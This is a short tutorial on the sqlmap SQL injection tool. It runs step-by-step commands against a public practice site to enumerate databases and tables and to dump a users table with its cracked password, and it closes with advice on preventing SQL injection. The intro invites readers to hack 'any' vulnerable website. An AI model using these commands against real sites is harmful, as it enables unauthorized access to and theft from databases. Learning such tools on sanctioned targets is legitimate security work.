Sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It is an open-source tool to use Sql injection in better and simpler way.
Let’s go to see how to install this tool in your ubuntu machine and run test to hack the database of any Sql injection vulnerable websites.
Let’s start Sqlmap by showing the help screen:
Sqlmap is installed by default on Kali Linux, if you don’t have it, you can install in running this command:
apt install sqlmap
Now we’re going to put Sqlmap into test using a test site for databases test.vulnweb.com:
Now we scan the target with:
sqlmap http://test.php.vulnweb.com/artists.php?artist=1 –dbs –batch
And the result came back down to two databases:
We need to test the “acuart” database:
sqlmap http://test.php.vulnweb.com/artists.php?artist=1 -D acuart –tables –batch
Now we have 8 tables, but we are interested in “users”:
sqlmap http://test.php.vulnweb.com/artists.php?artist=1 -D acuart -T users –columns –batch
Let’s dump all the data inside these columns to get the usernames and password if any available:
sqlmap http://test.php.vulnweb.com/artists.php?artist=1 -D acuart -T users –columns –dump –batch
In this part the Sqlmap tool found a hash for the password and tried to crack it using brute fore and managed to crack it and gave us the password.
Finally, we got the username “test” and the password which is “test” and also an email to use.
How to Prevent against SQL Injection Attacks
An organization can adopt the following policy to protect itself against SQL Injection attacks:
User input should never be trusted – It must always be sanitized before it is used in dynamic SQL statements.
Stored procedures – these can encapsulate the SQL statements and treat all input as parameters.
Prepared statements –prepared statements to work by creating the SQL statement first then treating all submitted user data as parameters. This has no effect on the syntax of the SQL statement.
Regular expressions –these can be used to detect potential harmful code and remove it before executing the SQL statements.
Database connection user access rights –only necessary access rights should be given to accounts used to connect to the database. This can help reduce what the SQL statements can perform on the server.
Error messages –these should not reveal sensitive information and where exactly an error occurred. Simple custom error messages such as “Sorry, we are experiencing technical errors. The technical team has been contacted. Please try again later” can be used instead of display the SQL statements that caused the error.